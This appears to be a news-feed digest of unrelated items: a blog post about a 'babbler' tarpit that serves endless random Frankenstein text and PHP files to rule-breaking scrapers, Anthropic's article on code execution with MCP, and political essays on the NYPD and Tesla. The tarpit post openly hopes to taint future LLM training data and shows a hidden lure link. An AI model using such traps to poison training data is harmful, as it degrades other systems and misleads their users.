So down another rabbit hole I went, writing an efficient garbage server. I started by loading the full text of the classic Frankenstein novel into an array in RAM where each paragraph is a node. Then on each request it selects a random index and the subsequent 4 paragraphs to display.

Each post would then have a link to 5 other "posts" at the bottom that all technically call the same endpoint, so I don't need an index of links. These 5 posts, when followed, quickly saturate most crawlers, since breadth-first crawling explodes quickly, in this case by a factor of 5.

You can see it in action here: https://herm.app/babbler/

This is very efficient, and can serve endless posts of spooky content. The reason for choosing this specific novel is fourfold:

  1. I was working on this on Halloween.
  2. I hope it will make future LLMs sound slightly old-school and spoooooky.
  3. It's in the public domain, so no copyright issues.
  4. I find there are many parallels to be drawn between Dr Frankenstein's monster and AI.

I made sure to add noindex,nofollow attributes to all these pages, as well as in the links, since I only want to catch bots that break the rules. I've also added a counter at the bottom of each page that counts the number of requests served. It resets each time I deploy, since the counter is stored in memory, but I'm not connecting this to a database, and it works.

With this running, I did the same for php files, creating a static server that would serve a different (real) .php file from memory on request. You can see this running here: https://herm.app/babbler.php (or any path with .php in it).

There's a counter at the bottom of each of these pages as well.

As Maury said: "Garbage for the garbage king!"

Now with the fun out of the way, a word of caution. I don't have this running on any project I actually care about; https://herm.app is just a playground of mine where I experiment with small ideas. I originally intended to run this on a bunch of my actual projects, but while building this, reading threads, and learning about how scraper bots operate, I came to the conclusion that running this can be risky for your website. The main risk is that despite correctly using robots.txt , nofollow , and noindex rules, there's still a chance that Googlebot or other search engines scrapers will scrape the wrong endpoint and determine you're spamming.

If you or your website depend on being indexed by Google, this may not be viable. It pains me to say it, but the gatekeepers of the internet are real, and you have to stay on their good side, or else . This doesn't just affect your search ratings, but could potentially add a warning to your site in Chrome, with the only recourse being a manual appeal.

However, this applies only to the post babbler. The php babbler is still fair game since Googlebot ignores non-HTML pages, and the only bots looking for php files are malicious.

So if you have a little web-project that is being needlessly abused by scrapers, these projects are fun! For the rest of you, probably stick with 403s.

What I've done as a compromise is added the following hidden link on my blog, and another small project of mine, to tempt the bad scrapers:

<a href="https://herm.app/babbler/" rel="nofollow" style="display:none">Don't follow this link</a>

The only thing I'm worried about now is running out of Outbound Transfer budget on my VPS. If I get close I'll cache it with Cloudflare, at the expense of the counter.

This was a fun little project, even if there were a few dead ends. I know more about Markov chains and scraper bots, and had a great time learning, despite it being fuelled by righteous anger.

Not all threads need to lead somewhere pertinent. Sometimes we can just do things for fun.

Code execution with MCP: building more efficient AI agents

Lobsters
www.anthropic.com
2025-11-15 06:21:44
Comments...
Original Article

The Model Context Protocol (MCP) is an open standard for connecting AI agents to external systems. Connecting agents to tools and data traditionally requires a custom integration for each pairing, creating fragmentation and duplicated effort that makes it difficult to scale truly connected systems. MCP provides a universal protocol—developers implement MCP once in their agent and it unlocks an entire ecosystem of integrations.

Since launching MCP in November 2024, adoption has been rapid: the community has built thousands of MCP servers , SDKs are available for all major programming languages, and the industry has adopted MCP as the de-facto standard for connecting agents to tools and data.

Today developers routinely build agents with access to hundreds or thousands of tools across dozens of MCP servers. However, as the number of connected tools grows, loading all tool definitions upfront and passing intermediate results through the context window slows down agents and increases costs.

In this blog we'll explore how code execution can enable agents to interact with MCP servers more efficiently, handling more tools while using fewer tokens.

Excessive token consumption from tools makes agents less efficient

As MCP usage scales, there are two common patterns that can increase agent cost and latency:

  1. Tool definitions overload the context window;
  2. Intermediate tool results consume additional tokens.

1. Tool definitions overload the context window

Most MCP clients load all tool definitions upfront directly into context, exposing them to the model using a direct tool-calling syntax. These tool definitions might look like:

gdrive.getDocument
     Description: Retrieves a document from Google Drive
     Parameters:
                documentId (required, string): The ID of the document to retrieve
                fields (optional, string): Specific fields to return
     Returns: Document object with title, body content, metadata, permissions, etc.
salesforce.updateRecord
    Description: Updates a record in Salesforce
    Parameters:
               objectType (required, string): Type of Salesforce object (Lead, Contact,      Account, etc.)
               recordId (required, string): The ID of the record to update
               data (required, object): Fields to update with their new values
     Returns: Updated record object with confirmation

Tool descriptions occupy more context window space, increasing response time and costs. In cases where agents are connected to thousands of tools, they’ll need to process hundreds of thousands of tokens before reading a request.

2. Intermediate tool results consume additional tokens

Most MCP clients allow models to directly call MCP tools. For example, you might ask your agent: "Download my meeting transcript from Google Drive and attach it to the Salesforce lead."

The model will make calls like:

TOOL CALL: gdrive.getDocument(documentId: "abc123")
        → returns "Discussed Q4 goals...\n[full transcript text]"
           (loaded into model context)

TOOL CALL: salesforce.updateRecord(
			objectType: "SalesMeeting",
			recordId: "00Q5f000001abcXYZ",
  			data: { "Notes": "Discussed Q4 goals...\n[full transcript text written out]" }
		)
		(model needs to write entire transcript into context again)

Every intermediate result must pass through the model. In this example, the full call transcript flows through twice. For a 2-hour sales meeting, that could mean processing an additional 50,000 tokens. Even larger documents may exceed context window limits, breaking the workflow.

With large documents or complex data structures, models may be more likely to make mistakes when copying data between tool calls.

Image of how the MCP client works with the MCP server and LLM.
The MCP client loads tool definitions into the model's context window and orchestrates a message loop where each tool call and result passes through the model between operations.

Code execution with MCP improves context efficiency

With code execution environments becoming more common for agents, a solution is to present MCP servers as code APIs rather than direct tool calls. The agent can then write code to interact with MCP servers. This approach addresses both challenges: agents can load only the tools they need and process data in the execution environment before passing results back to the model.

There are a number of ways to do this. One approach is to generate a file tree of all available tools from connected MCP servers. Here's an implementation using TypeScript:

servers
├── google-drive
│   ├── getDocument.ts
│   ├── ... (other tools)
│   └── index.ts
├── salesforce
│   ├── updateRecord.ts
│   ├── ... (other tools)
│   └── index.ts
└── ... (other servers)

Then each tool corresponds to a file, something like:

// ./servers/google-drive/getDocument.ts
import { callMCPTool } from "../../../client.js";

interface GetDocumentInput {
  documentId: string;
}

interface GetDocumentResponse {
  content: string;
}

/* Read a document from Google Drive */
export async function getDocument(input: GetDocumentInput): Promise<GetDocumentResponse> {
  return callMCPTool<GetDocumentResponse>('google_drive__get_document', input);
}

Our Google Drive to Salesforce example above becomes the code:

// Read transcript from Google Docs and add to Salesforce prospect
import * as gdrive from './servers/google-drive';
import * as salesforce from './servers/salesforce';

const transcript = (await gdrive.getDocument({ documentId: 'abc123' })).content;
await salesforce.updateRecord({
  objectType: 'SalesMeeting',
  recordId: '00Q5f000001abcXYZ',
  data: { Notes: transcript }
});

The agent discovers tools by exploring the filesystem: listing the ./servers/ directory to find available servers (like google-drive and salesforce ), then reading the specific tool files it needs (like getDocument.ts and updateRecord.ts ) to understand each tool's interface. This lets the agent load only the definitions it needs for the current task. This reduces the token usage from 150,000 tokens to 2,000 tokens—a time and cost saving of 98.7% .

Cloudflare published similar findings , referring to code execution with MCP as “Code Mode." The core insight is the same: LLMs are adept at writing code and developers should take advantage of this strength to build agents that interact with MCP servers more efficiently.

Benefits of code execution with MCP

Code execution with MCP enables agents to use context more efficiently by loading tools on demand, filtering data before it reaches the model, and executing complex logic in a single step. There are also security and state management benefits to using this approach.

Progressive disclosure

Models are great at navigating filesystems. Presenting tools as code on a filesystem allows models to read tool definitions on-demand, rather than reading them all up-front.

Alternatively, a search_tools tool can be added to the server to find relevant definitions. For example, when working with the hypothetical Salesforce server used above, the agent searches for "salesforce" and loads only those tools that it needs for the current task. Including a detail level parameter in the search_tools tool that allows the agent to select the level of detail required (such as name only, name and description, or the full definition with schemas) also helps the agent conserve context and find tools efficiently.

Context efficient tool results

When working with large datasets, agents can filter and transform results in code before returning them. Consider fetching a 10,000-row spreadsheet:

// Without code execution - all rows flow through context
TOOL CALL: gdrive.getSheet(sheetId: 'abc123')
        → returns 10,000 rows in context to filter manually

// With code execution - filter in the execution environment
const allRows = await gdrive.getSheet({ sheetId: 'abc123' });
const pendingOrders = allRows.filter(row => 
  row["Status"] === 'pending'
);
console.log(`Found ${pendingOrders.length} pending orders`);
console.log(pendingOrders.slice(0, 5)); // Only log first 5 for review

The agent sees five rows instead of 10,000. Similar patterns work for aggregations, joins across multiple data sources, or extracting specific fields—all without bloating the context window.

More powerful and context-efficient control flow

Loops, conditionals, and error handling can be done with familiar code patterns rather than chaining individual tool calls. For example, if you need a deployment notification in Slack, the agent can write:

let found = false;
while (!found) {
  const messages = await slack.getChannelHistory({ channel: 'C123456' });
  found = messages.some(m => m.text.includes('deployment complete'));
  if (!found) await new Promise(r => setTimeout(r, 5000));
}
console.log('Deployment notification received');

This approach is more efficient than alternating between MCP tool calls and sleep commands through the agent loop.

Additionally, being able to write out a conditional tree that gets executed also saves on “time to first token” latency: rather than having to wait for a model to evaluate an if-statement, the agent can let the code execution environment do this.

Privacy-preserving operations

When agents use code execution with MCP, intermediate results stay in the execution environment by default. This way, the agent only sees what you explicitly log or return, meaning data you don’t wish to share with the model can flow through your workflow without ever entering the model's context.

For even more sensitive workloads, the agent harness can tokenize sensitive data automatically. For example, imagine you need to import customer contact details from a spreadsheet into Salesforce. The agent writes:

const sheet = await gdrive.getSheet({ sheetId: 'abc123' });
for (const row of sheet.rows) {
  await salesforce.updateRecord({
    objectType: 'Lead',
    recordId: row.salesforceId,
    data: { 
      Email: row.email,
      Phone: row.phone,
      Name: row.name
    }
  });
}
console.log(`Updated ${sheet.rows.length} leads`);

The MCP client intercepts the data and tokenizes PII before it reaches the model:

// What the agent would see, if it logged the sheet.rows:
[
  { salesforceId: '00Q...', email: '[EMAIL_1]', phone: '[PHONE_1]', name: '[NAME_1]' },
  { salesforceId: '00Q...', email: '[EMAIL_2]', phone: '[PHONE_2]', name: '[NAME_2]' },
  ...
]

Then, when the data is shared in another MCP tool call, it is untokenized via a lookup in the MCP client. The real email addresses, phone numbers, and names flow from Google Sheets to Salesforce, but never through the model. This prevents the agent from accidentally logging or processing sensitive data. You can also use this to define deterministic security rules, choosing where data can flow to and from.

State persistence and skills

Code execution with filesystem access allows agents to maintain state across operations. Agents can write intermediate results to files, enabling them to resume work and track progress:

const leads = await salesforce.query({ 
  query: 'SELECT Id, Email FROM Lead LIMIT 1000' 
});
const csvData = leads.map(l => `${l.Id},${l.Email}`).join('\n');
await fs.writeFile('./workspace/leads.csv', csvData);

// Later execution picks up where it left off
const saved = await fs.readFile('./workspace/leads.csv', 'utf-8');

Agents can also persist their own code as reusable functions. Once an agent develops working code for a task, it can save that implementation for future use:

// In ./skills/save-sheet-as-csv.ts
import * as gdrive from './servers/google-drive';
export async function saveSheetAsCsv(sheetId: string) {
  const data = await gdrive.getSheet({ sheetId });
  const csv = data.map(row => row.join(',')).join('\n');
  await fs.writeFile(`./workspace/sheet-${sheetId}.csv`, csv);
  return `./workspace/sheet-${sheetId}.csv`;
}

// Later, in any agent execution:
import { saveSheetAsCsv } from './skills/save-sheet-as-csv';
const csvPath = await saveSheetAsCsv('abc123');

This ties in closely to the concept of Skills , folders of reusable instructions, scripts, and resources for models to improve performance on specialized tasks. Adding a SKILL.md file to these saved functions creates a structured skill that models can reference and use. Over time, this allows your agent to build a toolbox of higher-level capabilities, evolving the scaffolding that it needs to work most effectively.

Note that code execution introduces its own complexity. Running agent-generated code requires a secure execution environment with appropriate sandboxing , resource limits, and monitoring. These infrastructure requirements add operational overhead and security considerations that direct tool calls avoid. The benefits of code execution—reduced token costs, lower latency, and improved tool composition—should be weighed against these implementation costs.

Summary

MCP provides a foundational protocol for agents to connect to many tools and systems. However, once too many servers are connected, tool definitions and results can consume excessive tokens, reducing agent efficiency.

Although many of the problems here feel novel—context management, tool composition, state persistence—they have known solutions from software engineering. Code execution applies these established patterns to agents, letting them use familiar programming constructs to interact with MCP servers more efficiently. If you implement this approach, we encourage you to share your findings with the MCP community .

Acknowledgments

This article was written by Adam Jones and Conor Kelly. Thanks to Jeremy Fox, Jerome Swannack, Stuart Ritchie, Molly Vorwerck, Matt Samuels, and Maggie Vo for feedback on drafts of this post.

Friday Nite Videos | November 14, 2025

Portside
portside.org
2025-11-15 03:49:37
Friday Nite Videos | November 14, 2025 barry Fri, 11/14/2025 - 22:49 ...
Original Article

Friday Nite Videos | November 14, 2025

Trump Faces Mass Defections Over Epstein Files. The Assignment Is To Fight Fascism | AOC. Trump Gets Epstein-Busted; Ghislaine Gets VIP Treatment. Elmo and Cookie Monster Crash Netflix Auditions | Sesame Street. Is Our Universe Inside a Black Hole?

Portside Portside

For Mamdani To Beat the NYPD, the Left Must Build Power

Portside
portside.org
2025-11-15 03:24:59
For Mamdani To Beat the NYPD, the Left Must Build Power barry Fri, 11/14/2025 - 22:24 ...
Original Article

In cities across America, a new generation of left-wing mayors is confronting the same dilemma: What do you do when you inherit institutions designed to crush left movements like those that carried you into office? Socialist campaigns promise to challenge the power of capital, but upon taking office, left executives find themselves constrained by police unions, business interests, and state politicians eager to appear tough on crime. Does anyone have a good plan to push back?

In New York City, we’re about to find out—starting with the cops.

In the run-up to his election as mayor, Zohran Mamdani said he would keep Jessica Tisch—a billionaire heiress who has rolled back police reforms and collaborated with ICE—as NYPD commissioner. He repeated that pledge after his victory last week. Five years ago, Mamdani called the NYPD “racist, anti-queer,” “wicked,” and “corrupt.” After being forced to apologize for these comments, and pledging his support for the police, he’s now saying that he and Tisch can work together. This decision has drawn criticism from Mamdani’s supporters, and leftists have good reason to be concerned about Tisch’s record. Yet instead of viewing this as a betrayal, we should think of it as proof of how much power police have in local politics—and how little power the left holds.

Business elites demand aggressive policing because it establishes what they see as proper order , a prerequisite for commercial investment. To quote former NYPD Commissioner Bill Bratton, police “flush” homeless and other ostensibly disposable people “off the street” to fuel development and displacement . The ultra-rich aren’t being subtle about this. “Public safety is the number one fiscal stimulus,” one hedge fundie told Bloomberg just after Mamdani’s election.

The playbook is national. In San Francisco, Big Tech and real estate money toppled reform DA Chesa Boudin; in Minneapolis, defunding efforts were defeated in part by business and police union advocacy (though the full story is more complex ). The message travels: Undermine police power, and capital will move to punish you—at the ballot box, in the press, and through state preemption.

Because Mamdani’s campaign is now the test case for progressive governance , how he manages the NYPD will have enormous consequences for left organizing across the country. But ultimately, what happens will be less down to Mamdani’s choices than to ours. Without movements strong enough to either pressure or protect them, any left politician is bound to yield to these interests—and Mamdani is no different. We won’t be able to push Mamdani, or anyone else, to undermine police power unless we become a force to be reckoned with.

Who is Jessica Tisch, anyway? An heiress of the Loews Corporation, Tisch entered public service in 2008, working within the NYPD intelligence division that helped build a vast surveillance network targeting Muslims. Adams tapped her as commissioner in late 2024 after his earlier picks fell afoul of federal corruption probes. Tisch rooted out some cronyism in the department, and she has taken credit for subsequent declines in shootings, though New York may only be following a nationwide trend .

But Tisch has also practiced a firmly old-guard version of policing in ways that underscore just how strange a bedfellow she is set to be with Mamdani: adopting Bill Bratton’s broken windows policing practices, defending the city’s racist gang database, overseeing a training that labels the keffiyeh antisemitic, and collaborating with ICE to crush pro-Palestine protests. Against the available evidence , she blamed modest steps like bail reform and Raise the Age for post-pandemic crime spikes. She is also a staunch Zionist who has defended the NYPD’s brutal policing of Palestine protests, whereas Mamdani is an advocate for Palestinian liberation. And Tisch’s family members spent over a million dollars opposing Mamdani’s election.

So what explains their fragile alliance? In a word: power.

After Mamdani won the Democratic primary, the richest New Yorkers threw tantrums and lit money on fire . When Mamdani set out to assuage their fears, the scions of capital settled on one demand : Keep Tisch in her job. Adding to the pressure, Democratic party leaders initially stayed silent. Figures from Kathy Hochul to Hakeem Jeffries reportedly conditioned their endorsements on keeping Tisch. Faced with this onslaught, Mamdani yielded. If he wanted to turn his upstart campaign into a bona fide Democratic coalition, it seemed, he had no other choice.

Fulfilling their end of the Faustian bargain, Hochul awkwardly yet earnestly joined Mamdani at campaign rallies, and Kathy Wylde, one of the local ruling class’s most influential power brokers, began saying that perhaps all sides could find a way to work together. Now we will all see whether that’s true.

How should leftists interpret these developments? Writing in The Nation last July, writer and policing expert Alex Vitale discouraged Mamdani from keeping Tisch, arguing that she would “never truly ally with him.” After Mamdani confirmed that he wanted to keep Tisch, journalist Ken Klippenstein said Mamdani had chosen a “straitjacket,” while Spencer Ackerman called the decision a “big mistake,” noting that “Tisch cooperated with ICE to lock up Leqaa Kordia.”

I also do not see Mamdani and Tisch as natural allies, and I agree that Tisch’s collaboration with ICE was repugnant. Yet there is a clear explanation for Mamdani’s decision: There was no organized opposition. There wasn’t even a rumored alternative to Tisch, let alone a concerted campaign to propose one.

The left doesn’t build talent pipelines for police brass, and I’m not arguing that we should start. We want to reduce police resources, staffing, and technology. Yet our inaction meant Mamdani saw no constituency for another choice.

More broadly, the left has yet to recover from the backlash against the George Floyd uprising, and any honest observer would admit that regaining the momentum that crested in 2020 will require quite a bit of organizing. The consequence of all of this is that there was no significant counterweight to the immense forces urging Mamdani to stick with Tisch—and to repudiate his former stances on policing. Is it any wonder that he gave way?

The core battle over Tisch—and the political necessity of conceding, at least in part, to police power—appears to have been lost. But that doesn’t mean there is nothing the left can do. Instead of expending energy on battles we already decided not to fight, we should scrutinize what Mamdani’s NYPD does differently in 2026. We must ensure that Mamdani stays true to the promises he made: abolishing the Strategic Response Group (SRG), cutting overtime spending, and creating a Department of Community Safety. (SRG’s top officer filed for retirement the day after Mamdani won.)

Mamdani apparently recognizes that Tisch is a savvy politician. Her mentor and former top cop Bill Bratton describes himself as a political broker—it’s part of the job description. But he has political skills of his own. When Hell Gate asked Mamdani how he reconciled Tisch’s agenda with his own, his response was wry: “I think everyone will follow my lead—I’ll be the mayor.” Time will tell whether can stay three steps ahead of Tisch and her backers.

The first major hurdle for this relationship may come alongside any major Palestine-related action in 2026. Mamdani’s support base overlaps with Palestine activists—he started a Students for Justice in Palestine chapter in college—so it’s hard to imagine that he would be enthusiastic about police cracking student skulls or swarming Bay Ridge, as they did under Eric Adams. At the same time, Tisch is committed to brutal protest policing. Mamdani’s coalition will be severely, perhaps fatally, damaged if he winds up overseeing that kind of assault. He’s already working on an alternative protest-policing approach, but implementing it will be an early, defining test.

One constituency was remarkably quiet amid the battle to control the NYPD: the NYPD’s largest union, the Police Benevolent Association (PBA). The PBA endorsed no one in the mayoral race and stayed silent on Tisch. Given the PBA’s outsize influence on New York politics, its silence is deafening—and cannot be expected to last long.

How might we expect the PBA to greet its new Muslim socialist boss? Its relationship with New York’s first Black and democratic socialist mayor provides some clues. David Dinkins clashed with the PBA over his proposal to make the Civilian Complaint Review Board an independent, civilian-controlled agency. In 1992, the PBA organized an opposition rally of thousands of cops that devolved into a drunken riot , complete with cops shouting slurs and storming City Hall.

Bill de Blasio, whose campaign emphasized police reform more than Mamdani’s, also fought the police unions (and lost). Cops turned their backs on de Blasio and walked off the job—a classic police tactic, given that work slowdowns generate headlines reinforcing the myth that police pullbacks endanger residents. The nadir of the relation between police and de Blasio came during the 2020 protests, when a police union gleefully posted a report of Chiara de Blasio’s arrest—an incident likely on Mamdani’s mind, as he hired additional security after Islamophobic threats.

The battle over Tisch may not be a primary focus for police unions (though the Sergeants Benevolent Association thinks Tisch should stay). The only major play that the unions have made so far is forcing Mamdani to apologize for calling them racist—hardly a controversial claim, as Eric Adams famously founded an organization drawing attention to the issue, but one Mamdani walked back nonetheless.

On the one hand, perhaps police see Mamdani’s modest reform promises as tolerable. On the other hand, perhaps they are waiting for an opportune moment to press for what they always want: more money and less accountability.

Could the proposed Department of Community Safety cause a fight over city resources? Mamdani often notes that police are stuck with work they don’t want, like mental-health crisis response. But across the country, police fight to maintain their professional authority. In Baltimore , violence interrupters work to stop retaliatory violence. Because they won’t share real-time street information with cops, relations are tense. Police view interrupters as criminals, and interrupters feel that they have become targets of police sabotage. If the new department competes for dollars, expect police backlash—the NYPD arrested two interrupters last year.

Maybe Mamdani keeps Tisch and compels her to carry out reforms; maybe she storms off and the press calls it a crisis. Either way, what happens next will measure the left’s real strength.

If she walks, organizers should move to block any consensus around a status-quo safety agenda. The task will be to give Mamdani political cover to appoint a commissioner actually willing to implement his program.

If she stays and complies, we should be ready to push for more ambitious demands: reduced NYPD technology and surveillance capacity, the end of the gang database and status-quo approaches to gang policing , and budget and headcount reductions. We are in the unfortunate position of needing to organize like hell just to claw back the status quo we enjoyed in 2019—the city jail population nearly doubled under Adams.

In either scenario, we will need to become stronger. The defund movement in NYC was ruthlessly crushed and co-opted —this is part of why the billionaires are able to choose what happens with the NYPD.

Organizers focused on criminalization may need to engage in electoral work more often. Mamdani is ostensibly accountable to NYC-DSA, for example. Mamdani’s allies have also created a nonprofit to continue the momentum of his campaign, which is focused on affordability—but has made no mention of organizing around safety. There may be a case for joining such organizations to push internal decision-making to address policing and incarceration.

Labor action is another important tactic. Across the country, police and corrections officers use wildcat strikes to resist accountability and retaliate against criminalized people. Strikes work! Aligning labor with anti-police organizing magnifies leverage. Twentieth-century movements succeeded by disrupting capital to force politicians’ hands . The New Deal and the Civil Rights Act were the result of militant, disruptive mass action. Effective tactics may seem uncivil or illegitimate—that’s too bad for the respectability police.

Organizing efforts could dovetail with Mamdani’s agenda. The Department of Community Safety will demonstrate the potential of non-police approaches. That said, the administration’s ability to move towards abolitionist horizons depends on our power.

In an ideal world, Mamdani’s coalition would be so robust that we could insulate him from the fallout of calling the NYPD’s bluff when it walks off the job—or firing Tisch if she refuses to budge on more ambitious steps. Indeed, throwing Tisch under the bus at an opportune moment could be a great play to undermine the prospects of a potential threat in the next election.

What we learn from the billionaires’ insistence on Tisch is that, while they’ll merely grumble about a leftist agenda on the cost of living—and, potentially, higher taxes—they are not prepared to brook dissent on the running of the policing machine. This is true in every city where progressives are gaining power. To build a government that serves working people, police power must be challenged. Winning the election was an accomplishment, but the NYPD didn’t even see it as a fight worth joining. That means the real battle still lies ahead.

Now is the time to find a political home for that battle. Everyone has skills that can contribute to the cause. Perhaps it’s taking notes in union meetings, signing up for ICE-watch training, or phonebanking to keep voters engaged. Even one small task matters.

Mamdani can’t beat the NYPD alone. No politician can. The only way to break the cops’ choke hold on city politics is to become stronger than them. Tisch’s tenure should remind us what’s at stake: Until the left can build and sustain real power in the streets, the billionaires will keep theirs in City Hall.

Jonathan Ben-Menachem is a PhD candidate in sociology at Columbia University, where he researches the politics of criminalization and crime journalism.

The Fake $1 Trillion Nail in Tesla’s Coffin

Portside
portside.org
2025-11-15 02:50:15
The Fake $1 Trillion Nail in Tesla’s Coffin barry Fri, 11/14/2025 - 21:50 ...
Original Article

So, Musk won the vote for his “$1 trillion pay package”. Truth be told, I am not that surprised. But what does this mean for Tesla and its future? Well, in short, nothing good. This is the final cast-off, solidifying Musk as an untouchable authoritarian king of Tesla, enabling and exaggerating his already broken delusions — all while Tesla leaves the shores of reality and sails off into the murky waters of a demonstrably false unreality. It will all end in tears.

Let’s start off by de-propagandising this mess.

This isn’t a $1 trillion pay package. Logically, Musk would be paid in Tesla stock, and for this payday to be worth $1 trillion, Tesla would have to be worth $8.5 trillion, or just less than eight times its current value. This is more than 50% more than the current most valuable company in the world, Nvidia, whose value most experts believe is significantly inflated by the AI bubble. This value increase isn’t one of the conditions for Musk receiving his payout; instead, it is assumed this is how much Tesla will be worth if he achieves the other conditions. However, one of these conditions is that Musk receives annual revenue up to $400 billion and an $8.4 trillion valuation, which would give Tesla a P/E ratio (the value of its stock to its earnings) of 21,250, or over 100 times its current, already far too high, P/E ratio. So no — in no fucking world is this a $1 trillion pay package. You would have to be out of your mind to believe that for a second. It is more like a $100 billion package. This “$1 trillion” thing is just a PR stunt, a way to make Musk and Tesla look much more impressive than they actually are (with more on that in a minute).

On top of that, the conditions Musk has to meet to receive this payday are nowhere near specific enough to hold him to account and ensure he actually delivers growth. I have already written about this, so if you want to know the details, read more here .

Take the condition that by 2035, Musk is expected to deliver one million Bots. (Tesla defines “Bot” as “any robot or other physical product with mobility using artificial intelligence manufactured by or on behalf of the company” — yet, somehow, the company’s vehicles do not count). Firstly, it is odd that they use the word “delivered” instead of “sold”, given that the number of sales are a much better metric for growth. In fact, the proper metric for growth would be how many Bots are in active use and the duration of this time period. So, for Musk to meet this condition, he doesn’t even need to sell the Optimus robot he has been parading around. He can give SpaceX a million AI-powered RC cars, akin to that weird robot on the Death Star, and technically achieve this condition. SpaceX doesn’t even have to use them!

Every single one of these pay package conditions is worded in such a way that Musk can meet them without delivering any actual growth. That is a giant red flag. But we should have expected this, as Tesla’s Master Plan 4, which these conditions are based on, still lacks any real detail — it’s more like a buzzword salad flopped together by Grok.

So, it isn’t a $1 trillion pay package at all; it is closer to a $100 billion pay package (even though this is still far too large for any executive pay), and all of the conditions Musk must meet to get this pay package are worded in such a purposefully broad way, that Musk can meet them all without delivering a single ounce of growth.

Okay, but does Musk deserve this money?

Well, I am firmly in the camp that no one should be a billionaire, let alone have a single $100 billion payday. So, ethically, I don’t think Musk deserves it. This is a man who could have solved world hunger but chose to fund fascism instead, after all.

But when you look at the state of Tesla, it’s hard to argue Musk should even be CEO.

His big projects — the Cybertruck, FSD, and Robotaxi — are demonstrable failures. The Cybertruck was supposed to solidify Tesla’s dominance in the EV market, but instead, it is the largest automotive sales flop in history. FSD was supposed to allow Tesla to produce the first self-driving car, but the systems is demonstrably dangerous and light-years behind the competition. Not to mention it too is a sales flop, with Tesla having to slash its prices to even get a handful of customers through the door. Likewise, the Robotaxi is horrifyingly dangerous, which has stalled its rollout, and in the meantime, competitors like Waymo have continued to rapidly expand. Each of these projects has cost Tesla billions of dollars, and none of them are even close to breaking even, let alone making a profit.

And it is all because of Musk’s woeful micromanagement.

Consider that time Musk ignored his executives’ advice not to focus on Robotaxis, as they discovered that even if they could make them work, they wouldn’t make any money, and instead they should focus on building a more affordable EV (read more here ). Now, the Model Y has lost its title as Europe’s best-selling car to the Renault 5, which has almost the same specs and price as the Tesla Model 2, which Musk scrapped to direct funds towards Robotaxis, was meant to have…

On that note, Tesla sales continue to crater to this day, largely because Musk’s political affiliations have destroyed the brand’s value. This has pushed Tesla’s profit margin down to near zero! In fact, as costs rise due to Robotaxi and Optimus development, there is a chance that Tesla will begin to post losses in the near future.

This isn’t a CEO who deserves a raise; it is one who deserves to be ousted.

So, why isn’t he being ousted? And why have shareholders handed him this utterly gargantuan pay package, with such flimsy conditions that a burnt Neuralink test monkey could meet them?

I can see two reasons.

Firstly, blackmail. Tesla’s board repeatedly warned that if this pay package didn’t pass, there was a serious chance Musk would leave Tesla. I say warned — that is a direct threat. Gary Black, a hedge fund manager who heavily backs Tesla, publicly stated that if Musk stepped down, Tesla’s stock could fall by 20% to 25%. However, I, and many others, believe this is a massive underestimation. My own analysis suggests that if Tesla were valued as a car company rather than based on Musk and his bullshit promises, as it would be if Musk left, it would lose closer to 90% of its value (read more here ). Investors know this, so Musk’s threat to leave is more or less him saying, “Pay me all the money, or I will make your investment value collapse.”

You can’t consider a choice “free” if the only options are “Pay me money I don’t deserve or I will hurt you.”

And guess what, investors, big or small, don’t want to lose money. That is a damn good reason why many voted in favour. Needless to say, in many countries, Musk’s and the Tesla Board’s actions here would be seen as corporate extortion and would be wildly illegal.

But the second reason many voted in favour of the pay package is tied to why Tesla is worth so much more than it should be. Quite simply, Musk is a cult leader, and his followers are Tesla investors. He speaks exactly like a cult leader, constantly using internal coded language, thought-terminating clichés, and doublespeak, inducing shame and guilt in outsiders, and using isolating rhetoric. Like all cult leaders, he plays this off with a painfully bad charisma that comes across like the spelling mistakes in those Nigerian Prince emails — a way to filter out the rest and focus on the easy-to-manipulate, desperate people. Then, he sells his big, impossible ideas and waits for these people to invest (i.e., hand over their life savings) in him with the promise that he will make them wildly wealthy down the line. The world of Tesla investing is a cult; the only thing it is missing is the weird robes and sex rituals (presumably).

Sadly, institutions saw this ability and knew they could use it to make themselves a ton of money. They bought in, leaned into Musk’s cult and echoed Musk’s manipulations, pulling more followers in and increasing their investment’s value. That is why analysts like Dan Ives give nonsensical logic for their support of Musk’s ideas. They don’t believe what Musk is saying, but they know someone will, and if they buy in, their investment will go up.

This has caused the public and institutional investors to not look at Tesla logically. The only thing they ask is, “Is this going to bring more people into the cult?” Considering the $1 trillion propaganda line and the fact that the promises Musk is making are on a scale never seen before, most of them likely thought it would. After all, billions of people have been reading for months now about how Musk will be paid a trillion dollars to take over the world economy with robots. It doesn’t matter if that will actually happen, but whether it will spread enough fear, manipulation, and FOMO to bring people in.

Before I looked at the numbers, I thought the latter was closer to the truth. But after, I’m not so sure.

Musk’s pay packet won with 75% of the votes, with Musk’s 15.3% of the votes not counting. That sounds like a landslide, right? Well, it isn’t. Let me explain.

Institutional investors, such as mutual funds and investment banks, own 48.1% of Tesla, public retail investors own 36.3%, and insiders own 15.4% (which is mostly Elon’s 15.3% stake, so we can ignore them in this case).

Almost all institutional investors, such as Vanguard, JPMorgan, and BlackRock, backed Musk’s pay package. Tesla makes up a considerable portion of its investment portfolio and can’t risk it collapsing, so almost every single one voted yes purely because of the blackmail. If Musk left, the cult dissolved, and the public investors sold up, they would lose billions!

But only 84.7% of shares voted on this pay packet, meaning that this 48.1% bloc of investors made up 57% of the vote. So, Musk had won this vote before it had ever started.

That also means that of the 36.3% of Tesla shareholders who are publicly held, they voted almost perfectly 50% yes and 50% no. But here is the thing: Tesla’s public investors, of whom there are likely millions, seriously outnumber the few thousand institutional investors. So, if these votes weren’t weighted based on how much stock each person/organisation owned, this would have only just passed by the skin of its teeth!

This shows the cult of Elon is straining. It is being pushed to its limits, and major figures within its ranks were happy to risk losing it all rather than indulge Musk in his demented leadership. The institutional investors who went along with the blackmail will know this. They will know that another push like this could send the public investors, the actual members of the cult, scattering, sending the value of the investment to the floor.

So yes, 75% was a sizeable vote in favour of Musk. But when you consider the makeup of the voters, the cult of Elon, and the blackmail, that 25% no vote suddenly seems like an awfully significant resistance.

Okay, so what about Tesla’s future?

Well, this vote has done two things: severed Tesla’s last connection with reality and provided Musk with total authoritarian control.

As I have already mentioned, Musk shouldn’t be Tesla’s CEO, let alone be given this much wealth. But the fact that he was able to blackmail his own investors into bowing before him has effectively solidified him as the authoritarian leader of Tesla. No one can hold him to account now. He can do with Tesla what he likes.

This is a horrifically bad thing, because Musk is about to wheedle the last drop of reality from Tesla.

